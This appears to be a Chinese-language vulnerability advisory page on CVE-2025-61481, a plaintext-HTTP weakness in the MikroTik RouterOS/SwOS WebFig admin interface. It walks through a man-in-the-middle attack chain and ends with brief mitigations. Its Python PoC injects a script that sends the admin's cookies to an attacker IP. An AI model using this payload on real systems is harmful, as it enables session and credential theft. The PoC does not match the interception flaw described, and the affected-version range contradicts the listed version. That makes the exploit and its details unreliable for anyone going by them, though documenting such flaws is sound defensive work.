CVE-2025-61481 CVSS 10.0 严重

CVE-2025-61481: MikroTik RouterOS/SwOS WebFig明文传输导致凭证窃取漏洞

披露日期: 2025-10-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-61481

漏洞类型

敏感信息泄露,XSS,中间人攻击

CVSS评分

10.0 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

MikroTik RouterOS v.7.14.2, MikroTik SwOS v.2.18

漏洞概述

该漏洞源于MikroTik RouterOS和SwOS的WebFig管理界面默认使用未加密的HTTP协议进行通信。攻击者可通过中间人攻击拦截明文流量，在管理员登录过程中注入恶意JavaScript代码，从而窃取管理员凭据或执行其他恶意操作。CVSS 10.0的评分表明该漏洞具有极高的严重性，无需认证即可利用，且可导致敏感信息泄露和系统完整性破坏。

技术细节

WebFig管理接口在HTTP协议上运行，缺乏TLS加密保护。攻击者可通过ARP欺骗或DNS劫持等中间人攻击技术，拦截并篡改HTTP流量。注入的JavaScript代码会在管理员浏览器中执行，可窃取session cookie、登录凭据或进行其他恶意操作。RouterOS 7.14.2和SwOS 2.18版本均受影响。

攻击链分析

STEP 1

步骤1: 中间人攻击

攻击者通过ARP欺骗或网络嗅探拦截管理员与MikroTik设备之间的HTTP通信

STEP 2

步骤2: JavaScript注入

在拦截的HTTP响应中注入恶意JavaScript代码

STEP 3

步骤3: 凭证窃取

管理员浏览器执行注入的JavaScript，将凭据发送到攻击者控制的服务器

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import argparse

def exploit_cve_2025_61481(target_ip, attacker_ip):
    # 构造恶意JavaScript payload
    js_payload = """<script>fetch('http://{}:8080/steal?c='+btoa(document.cookie))</script>""".format(attacker_ip)
    
    # 发送恶意请求
    target_url = f"http://{target_ip}/webfig"
    response = requests.post(target_url, data={'html': js_payload})
    
    return response.text

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='CVE-2025-61481 Exploit')
    parser.add_argument('--target', required=True, help='Target MikroTik IP')
    parser.add_argument('--attacker', required=True, help='Attacker IP')
    args = parser.parse_args()
    
    print(exploit_cve_2025_61481(args.target, args.attacker))

影响范围

MikroTik RouterOS < 7.14.2

MikroTik SwOS < 2.18

防御指南

临时缓解措施

立即启用WebFig的HTTPS功能，使用强密码策略，限制管理接口访问，并监控异常网络流量

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表